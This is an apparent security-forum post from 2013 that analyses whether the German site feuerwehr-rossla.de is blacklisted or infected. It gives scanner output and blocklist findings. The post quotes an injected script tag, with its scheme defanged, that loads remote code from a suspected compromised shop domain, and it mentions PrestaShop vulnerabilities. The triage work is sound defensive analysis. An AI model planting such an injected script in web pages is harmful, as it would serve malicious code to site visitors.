« previous next »
Pages: [1]   Go Down

Author Topic: Blacklisted site clean or with MW:ANOMALY:SP8  (Read 1945 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33902
  • malware fighter
Blacklisted site clean or with MW:ANOMALY:SP8
« on: November 30, 2013, 06:45:45 PM »
See: http://maldb.com/feuerwehr-rossla.de/#blacklists
See: https://www.virustotal.com/nl/url/8f11788d3542b2a22d794a9e220e5a590454014f08b54577b3fa05c50672fc79/analysis/
No detections here: http://urlquery.net/report.php?id=8076586
jsunpack scan here: http://jsunpack.jeek.org/?report=3da626169579d0916c2a3378e28619b8f9c11229
see code hisck-up: ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js benign
[nothing detected] (script) ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
     status: (referer=feuerwehr-rossla.de/)saved 55740 bytes 4a17c73d94831fe9c67af02550ecdc639681ddbb
     info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
     info: [decodingLevel=0] found JavaScript
     error: line:3: SyntaxError: invalid flag after regular expression:
          error: line:3: s,"form")?jQuery.makeArray(this.elements):this;}).filter(function(){return this.name&&!this.disabled&&(this.checked||/select|textarea/i.test(this.nodeName)||/text|hidden|password/i.test(this.type));}).map(function(i,elem){var val=jQuery(this).val();return
          error: line:3: ^
     suspicious:

Injection Check -> Suspicious Text after HTML

<script src="htxp://simplechic.pl/translations/x1cuodn3.php?id=52520410" type="text/javascript"></script>
See: simplechic dot pl/modules/menu/js/superfish-modified.js benign
[nothing detected] (script) simplechic.pl/modules/menu/js/superfish-modified.js
     status: (referer=simplechic dot pl/)saved 3765 bytes ccaa5ae25a9f3744dfcc7f68896782755f19712d
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined variable $.fn
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var $.fn = 1;
          error: line:1: ....^
     suspicious: Location: htxp://simplechic.pl/pl/
Note: This line has redirected the request to htxp://simplechic.pl/pl/ -> The connection timed out before all (any?) content was returned!

Suspicious: simplechic dot pl/modules/productscategory/productscategory.js benign
[nothing detected] (script) simplechic dot pl/modules/productscategory/productscategory.js
     status: (referer=simplechic dot pl/pl/)saved 1931 bytes 383c64bce6a9e70599fac4571fdcd15bbaec9786
     info: [decodingLevel=0] found JavaScript
     error: undefined variable $
     error: undefined function $
     suspicious:  found as benign here: http://zulu.zscaler.com/submission/show/5e67e586563ba033987021d87c4634b2-1385833221
PrestaShop vulnerable to random pages and exploitable: http://www.cvedetails.com/vulnerability-list/vendor_id-8950/Prestashop.html

Here the site is given as blacklisted and with malware; http://sitecheck.sucuri.net/results/feuerwehr-rossla.de/
Blocked by Google Safebrowsing: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=feuerwehr-rossla.de

polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
Pages: [1]   Go Up
« previous next »